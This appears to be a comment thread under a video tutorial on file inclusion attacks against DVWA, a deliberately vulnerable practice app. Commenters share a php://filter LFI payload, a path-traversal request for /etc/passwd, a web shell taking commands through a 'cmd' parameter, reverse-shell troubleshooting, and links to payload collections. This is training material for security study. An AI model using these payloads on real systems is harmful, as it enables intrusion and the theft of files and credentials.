Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources: www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/ highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g. 127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
i have been looking for a way to get the third quote by myself since i wanted to just cat the file with the reverse shell, but im running dvwa in docker and cant easily find php.ini, can't believe i didn't see this comment, great vid btw
Great video. I'm learning quite a lot. thank you for providing such information for free. For the guys asking about the hidden line 3; we got a reverse shell on the system, you can "cd" to the hackable folder and "cat" the contents of "fi.php" file. That way, you'll read the source code behind the file itself which will expose the hidden line. e.g. $ cat /var/www/html/dvwa/hackable/flags/fi.php of course, this is the full path to the file on my vm. replace the path to match your system setup :)
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
It's been a long time since I made this *but* I might of used HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
Quite often I'll just use a really simple shell.php containing: Then pass the system command as a get parameter, e.g. victim.oops/?cmd=whoami For more web shells: github.com/swisskyrepo/PayloadsAllTheThings For reverse shells, this site is great: www.revshells.com 😉
It's a helpful and great video! Unfortunately, I have some questions when I tried RFI with reverse shell. Is it possible if I want your any contact method?
@@_CryptoCat Oh no! My reply had been disappeared! RU-vid...let me write down the comment, please!🥲 OK! Thank you for your reply! I run DVWA by vulnerables/web-dvwa docker, and Setup Check are both Enabled. In addition, I could successfully RFI through visiting google page. However my python http server and nc couldn't get any message, even though the PHP file is just "Hello World!". Do you have any idea or suggestion?
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a docker container, you'll need to also run the python http server and nc inside of that docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the docker with docs.docker.com/engine/reference/commandline/exec
Wow ! I was having trouble getting a shell back because of the contents of shell.php. I had to change those to match exactly yours. In a real world scenario the allow_url_include has to be turned on for this to work right? What if its turned off, do you know of any way to work around this? Thanks
yep exactly! for PHP you would need allow_url_include enabled for RFI to work but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions so look out for these when no other form of input validation is in place 😉
Hi mate, I'm not 100% sure but you probably need have the shell connect back to your docker IP address, rather than your VM IP address. If you run docker container with -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
oh yeh good point! you might be able to use some tricks to read the php file source code, check this out - infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
Hey, the local file inclusion doesn't seem to work for me in lwo level. i'm trying this: "?page=../../../../../../etc/passwd" it's not working it only says no such file or directory
@@_CryptoCat Oh yeah, i do tried other files; also i was on windows which was the main cause, i'm currently researching windows file system but if you know the alternate version of etc/passwd for windows you could tell me